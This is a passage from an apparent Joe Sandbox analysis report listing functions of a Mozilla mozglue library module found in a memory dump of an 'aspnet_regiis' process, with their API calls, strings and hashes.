                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                    • String ID: 0
                                                                                                                                                                    • API String ID: 438689982-4108050209
                                                                                                                                                                    • Opcode ID: 51ad183619de2bf521569a3f5e0149bde4841601fcb6327daa62fcfe90911a31
                                                                                                                                                                    • Instruction ID: 9c05de48745d7a43cc84d82055589a09fc164d8ffaaa2857fe575a50be5c1156
                                                                                                                                                                    • Opcode Fuzzy Hash: 51ad183619de2bf521569a3f5e0149bde4841601fcb6327daa62fcfe90911a31
                                                                                                                                                                    • Instruction Fuzzy Hash: EF511276A002568FCB00CF18D890AAABBB5FF99304F19859DD85A5F752D731ED06CBE0
                                                                                                                                                                    Function 6C7F77D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7F77FA
                                                                                                                                                                    • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C7F7829
                                                                                                                                                                      • Part of subcall function 6C7CCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C7931A7), ref: 6C7CCC45
                                                                                                                                                                      • Part of subcall function 6C7CCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C7931A7), ref: 6C7CCC4E
                                                                                                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C7F789F
                                                                                                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C7F78CF
                                                                                                                                                                      • Part of subcall function 6C794DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C794E5A
                                                                                                                                                                      • Part of subcall function 6C794DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C794E97
                                                                                                                                                                      • Part of subcall function 6C794290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C7D3EBD,6C7D3EBD,00000000), ref: 6C7942A9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2525797420-0
                                                                                                                                                                    • Opcode ID: e39e1acb42ed8b597624d7b98d7978b6fc019dd784fafbc0199ab86db1207c70
                                                                                                                                                                    • Instruction ID: a73b8059b1d24efd94435f10ca7bdf0b081ed93bccde32d6a0ac733f8bce7fa5
                                                                                                                                                                    • Opcode Fuzzy Hash: e39e1acb42ed8b597624d7b98d7978b6fc019dd784fafbc0199ab86db1207c70
                                                                                                                                                                    • Instruction Fuzzy Hash: 2141BE719047468FD300DF29C48456AFBF4FF8A258F204A2DE4A987741DB30E55ACBD2
                                                                                                                                                                    Function 6C7D6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C7D82BC,?,?), ref: 6C7D649B
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D64A9
                                                                                                                                                                      • Part of subcall function 6C7CFA80: GetCurrentThreadId.KERNEL32 ref: 6C7CFA8D
                                                                                                                                                                      • Part of subcall function 6C7CFA80: AcquireSRWLockExclusive.KERNEL32(6C81F448), ref: 6C7CFA99
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D653F
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7D655A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3596744550-0
                                                                                                                                                                    • Opcode ID: fb5ca3138d8d319692306e90a186a88bff8601bcdb402993d197eaf1826d1d0b
                                                                                                                                                                    • Instruction ID: aea66cd02b2e95b7788b1acf9bab297d1f21fd080245c2454d02a61cc273da3f
                                                                                                                                                                    • Opcode Fuzzy Hash: fb5ca3138d8d319692306e90a186a88bff8601bcdb402993d197eaf1826d1d0b
                                                                                                                                                                    • Instruction Fuzzy Hash: CE3181B5A043059FD700CF14D988A9ABBE4FF89314F10482DE85A97741D734FA19CBD2
                                                                                                                                                                    Function 6C7CFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C7ED019,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?), ref: 6C7CFFD3
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,6C7ED019,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?,?), ref: 6C7CFFF5
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,6C7ED019,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?), ref: 6C7D001B
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C7ED019,?,?,?,?,?,00000000,?,6C7DDA31,00100000,?,?), ref: 6C7D002A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 826125452-0
                                                                                                                                                                    • Opcode ID: f6a7d1c35578de38a8007ccb870ccb02fa445a10c2ddd90a0f7f910790715b01
                                                                                                                                                                    • Instruction ID: 6c36abbe1ab04d565708a6e37b058590c5558377572f1cc2082a34392453db18
                                                                                                                                                                    • Opcode Fuzzy Hash: f6a7d1c35578de38a8007ccb870ccb02fa445a10c2ddd90a0f7f910790715b01
                                                                                                                                                                    • Instruction Fuzzy Hash: 3021D6B2B002165FC7189E7CDD948AFB7BAFB853247250738E425D7781EA70AD0186E1
                                                                                                                                                                    Function 6C7AB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7AB4F5
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7AB502
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7AB542
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7AB578
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                    • Opcode ID: e37163061e391a51fb934bcfa061ceecedf41fd73d53d661b45c6afc26b41c04
                                                                                                                                                                    • Instruction ID: 9e7e6ea9e1c7a693e1d398a01c8e2cf5e1338ad300d4c5b02949bd328501a40b
                                                                                                                                                                    • Opcode Fuzzy Hash: e37163061e391a51fb934bcfa061ceecedf41fd73d53d661b45c6afc26b41c04
                                                                                                                                                                    • Instruction Fuzzy Hash: 9811AE30904B46C7D3228F69C604762B3F5FFA6318F10572AE84953E01EBB0B1C6C790
                                                                                                                                                                    Function 6C7D3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C79F20E,?), ref: 6C7D3DF5
                                                                                                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C79F20E,00000000,?), ref: 6C7D3DFC
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7D3E06
                                                                                                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C7D3E0E
                                                                                                                                                                      • Part of subcall function 6C7CCC00: GetCurrentProcess.KERNEL32(?,?,6C7931A7), ref: 6C7CCC0D
                                                                                                                                                                      • Part of subcall function 6C7CCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C7931A7), ref: 6C7CCC16
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2787204188-0
                                                                                                                                                                    • Opcode ID: 7e31d721777a08e3b23430b25204c260577d2716196ef7103dc24a9046ff3d26
                                                                                                                                                                    • Instruction ID: eb9280b5dab19eb0fc8468b6e4ad8b9f3acb3d16726ff81924d1dda2f1f36c9d
                                                                                                                                                                    • Opcode Fuzzy Hash: 7e31d721777a08e3b23430b25204c260577d2716196ef7103dc24a9046ff3d26
                                                                                                                                                                    • Instruction Fuzzy Hash: E0F01CB1A002097FEB10AB54DC86DBB376DEB46628F050035FE0857B41D635BE2A86F7
                                                                                                                                                                    Function 6C7E2050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E205B
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C7E201B,?,?,?,?,?,?,?,6C7E1F8F,?,?), ref: 6C7E2064
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7E208E
                                                                                                                                                                    • free.MOZGLUE(?,?,?,00000000,?,6C7E201B,?,?,?,?,?,?,?,6C7E1F8F,?,?), ref: 6C7E20A3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                    • Opcode ID: 6d856774c32184db18cbc94e67c52dd63cd23bcdded9e3c6f8d7d193ed38385e
                                                                                                                                                                    • Instruction ID: bae8b636ad113f1e3dbf00b0b4b62b4b6b752c934b94c87831d726a3e90b7989
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d856774c32184db18cbc94e67c52dd63cd23bcdded9e3c6f8d7d193ed38385e
                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF0E9B21007119BC7218F16D88DB6BBBF8EF8A368F10012EF50687B10DB71A906CBD5
                                                                                                                                                                    Function 6C7E85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C7E85D3
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C7E8725
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                    • String ID: map/set<T> too long
                                                                                                                                                                    • API String ID: 3720097785-1285458680
                                                                                                                                                                    • Opcode ID: 1679eb8f07cae594f8f01abe52718704002f5bda26ddb6a66f270ae82fb8005d
                                                                                                                                                                    • Instruction ID: 98552c683fb16c409fe1725ec830e34ea0f638aff55c4e6f76d801873c8e0f7e
                                                                                                                                                                    • Opcode Fuzzy Hash: 1679eb8f07cae594f8f01abe52718704002f5bda26ddb6a66f270ae82fb8005d
                                                                                                                                                                    • Instruction Fuzzy Hash: BA516776604641CFD701CF29C288B56BBF1BF4A318F18C2AAD8595BB52C375E885CF92
                                                                                                                                                                    Function 6C79BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C79BDEB
                                                                                                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C79BE8F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                    • String ID: 0
                                                                                                                                                                    • API String ID: 2811501404-4108050209
                                                                                                                                                                    • Opcode ID: 28649d1183fc345494b5b19fc8ca95ec06c896b4eecd740542ae2821061a3aab
                                                                                                                                                                    • Instruction ID: 8320a314df6afb5ee7c1d7f88aef848c2b0cf644ced70bc8e34bcd4b0fade4c9
                                                                                                                                                                    • Opcode Fuzzy Hash: 28649d1183fc345494b5b19fc8ca95ec06c896b4eecd740542ae2821061a3aab
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D41A271909745CFC721CF78D581A9BB7F8AF8A348F004A2DF98557611D730E9598B82
                                                                                                                                                                    Function 6C7D3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7D3D19
                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C7D3D6C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _errnomozalloc_abort
                                                                                                                                                                    • String ID: d
                                                                                                                                                                    • API String ID: 3471241338-2564639436
                                                                                                                                                                    • Opcode ID: b196ca188054d4eb3b2eb5e098981d53deace5cb0be2aa9ab338224f8d9c6f10
                                                                                                                                                                    • Instruction ID: c4e907e6347f318030c39ac2b79d3dd756dd5934aa05430e20c7c17f813a98f4
                                                                                                                                                                    • Opcode Fuzzy Hash: b196ca188054d4eb3b2eb5e098981d53deace5cb0be2aa9ab338224f8d9c6f10
                                                                                                                                                                    • Instruction Fuzzy Hash: AF110435F046899BDB108F69C91A4EDB775EF86318F46822DEC459BA02EB30B584C790
                                                                                                                                                                    Function 6C7A4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7A44B2,6C81E21C,6C81F7F8), ref: 6C7A473E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C7A474A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: GetNtLoaderAPI
                                                                                                                                                                    • API String ID: 1646373207-1628273567
                                                                                                                                                                    • Opcode ID: a23f3a932f397e9697938e5ca56b88c7160c0d3f61cae6756bec91ade0ff097e
                                                                                                                                                                    • Instruction ID: c1ba505aea9898fce71d6d540be8da2e25dc80e503ccc02c94f787c3ad70c8d5
                                                                                                                                                                    • Opcode Fuzzy Hash: a23f3a932f397e9697938e5ca56b88c7160c0d3f61cae6756bec91ade0ff097e
                                                                                                                                                                    • Instruction Fuzzy Hash: D101CC757002558FDF209FB69999A297BF9EB8A328B044039E905C7B00CB74E802CFD1
                                                                                                                                                                    Function 6C7F6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C7F6E22
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7F6E3F
                                                                                                                                                                    Strings
                                                                                                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C7F6E1D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footergetenv
                                                                                                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                    • API String ID: 1472356752-1153589363
                                                                                                                                                                    • Opcode ID: 6f1bcd50f3f006f294eb251033f9f02f04a8956d0bacf40dbfe269a2b1d9a630
                                                                                                                                                                    • Instruction ID: bf7a145418aa02747a74af6cfbeac363879f609adbf35bb22a6519cde4ae6aa6
                                                                                                                                                                    • Opcode Fuzzy Hash: 6f1bcd50f3f006f294eb251033f9f02f04a8956d0bacf40dbfe269a2b1d9a630
                                                                                                                                                                    • Instruction Fuzzy Hash: F5F0247A6092439FDA209B68CB96A8177F5633322CF040575C42847F51C721AE87DAD3
                                                                                                                                                                    Function 6C7A9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A9EEF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                    • String ID: Infinity$NaN
                                                                                                                                                                    • API String ID: 1385522511-4285296124
                                                                                                                                                                    • Opcode ID: d21276d75f7c08e6594223bf28e88e843a59a429a1c14aa6650facb670d28455
                                                                                                                                                                    • Instruction ID: ee6a82d4a2064cc68388982c4affb5518f1c36793e0b8b53c8e04c26f9def34d
                                                                                                                                                                    • Opcode Fuzzy Hash: d21276d75f7c08e6594223bf28e88e843a59a429a1c14aa6650facb670d28455
                                                                                                                                                                    • Instruction Fuzzy Hash: CBF06DB17286438AEB208F98DA4A66073F1A33731EF100A39E50406F41D736659ACAC2
                                                                                                                                                                    Function 6C7A6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0K}l,?,6C7D4B30,80000000,?,6C7D4AB7,?,6C7943CF,?,6C7942D2), ref: 6C7A6C42
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0K}l,?,6C7D4B30,80000000,?,6C7D4AB7,?,6C7943CF,?,6C7942D2), ref: 6C7A6C58
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
